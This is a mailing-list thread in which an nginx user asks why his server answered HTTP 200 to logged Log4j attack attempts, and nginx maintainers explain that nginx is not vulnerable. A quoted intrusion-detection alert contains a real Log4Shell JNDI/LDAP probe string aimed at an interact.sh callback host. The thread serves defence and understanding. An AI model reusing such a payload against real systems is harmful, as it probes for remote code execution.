Help request about Log4j attack attempts and NGINX logs meaning
lists
lists at lazygranch.com
Thu Dec 30 09:20:27 UTC 2021
This is the list of effected programs.
https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md
Original Message
From: maxim at nginx.com
Sent: December 29, 2021 11:21 PM
To: mauro.tridici at cmcc.it
Reply-to: nginx at nginx.org
Cc: nginx at nginx.org
Subject: Re: Help request about Log4j attack attempts and NGINX logs meaning
Mauro,
Unless you use somewhere in your stack log4j vulnerable software (nginx
is not) I don't see anything significant to worry about.
Maxim
On 29.12.2021 21:34, Mauro Tridici wrote:
> Helo Maxim,
>
> thank you very much for the explanation.
> In your opinion, is this the case to “fix” this behaviour (but I don’t know how, I’m a newbie, sorry) or I should simply ignore it?
>
> Many thanks again,
> Mauro
>
>> On 29 Dec 2021, at 19:29, Maxim Dounin <mdounin at mdounin.ru> wrote:
>>
>> Hello!
>>
>> On Wed, Dec 29, 2021 at 03:55:35PM +0100, Mauro Tridici wrote:
>>
>>> I have an old instance of NGINX (v.1.10.1) running as proxy
>>> server on a dedicated hardware platform.
>>> Since the proxy service is reachable from internet, it is
>>> constantly exposed to cyber attacks.
>>> In my particular case, it is attacked by a lot of Log4j attack
>>> attempts from several malicious IPs.
>>>
>>> At this moment, an host intrusion detection system (HIDS) is
>>> running and is protecting the NGINX server: it seems it is
>>> blocking every malicious attack attempts.
>>> Anyway, during the last attack mail notification sent by the
>>> HIDS, I noticed that the NGINX server response was “HTTP/1.1
>>> 200” and I’m very worried about it.
>>> Log4j and Java packages are NOT installed on the NGINX server
>>> and all the servers behind the proxy are not using Log4j.
>>>
>>> Could you please help me to understand the reason why the NGINX
>>> server answer was “HTTP/1.1 200”!?
>>>
>>> You can see below the mail notification I received:
>>>
>>>
>>> Attack Notification.
>>> 2021 Dec 28 20:45:59
>>>
>>> Received From: “hidden_NGINX_server_IP”
>>>> /var/log/nginx/access.log
>>> Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt
>>> detected."
>>> Src IP: 166.137.252.110
>>> Portion of the log(s):
>>>
>>> 166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET
>>> /?sulgz=${jndi:ldap://“hidden_NGINX_server_IP
>>> <ldap://%E2%80%9Chidden_server_IP>".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a
>>> <ldap://193.204.199.214.c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a>}
>>> HTTP/1.1" 200 3700 "-" "curl/7.64.0" “-"
>>
>> As you can see from the log line, the request is to "/" with some
>> additional request arguments ("?sulgz=..."). As unknown request
>> arguments are usually ignored, it is no surprise that such a
>> request results in 200.
>>
>> --
>> Maxim Dounin
>> http://mdounin.ru/
>> _______________________________________________
>> nginx mailing list
>> nginx at nginx.org
>> http://mailman.nginx.org/mailman/listinfo/nginx
>
>
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
--
Maxim Konovalov
_______________________________________________
nginx mailing list
nginx at nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
More information about the nginx
mailing list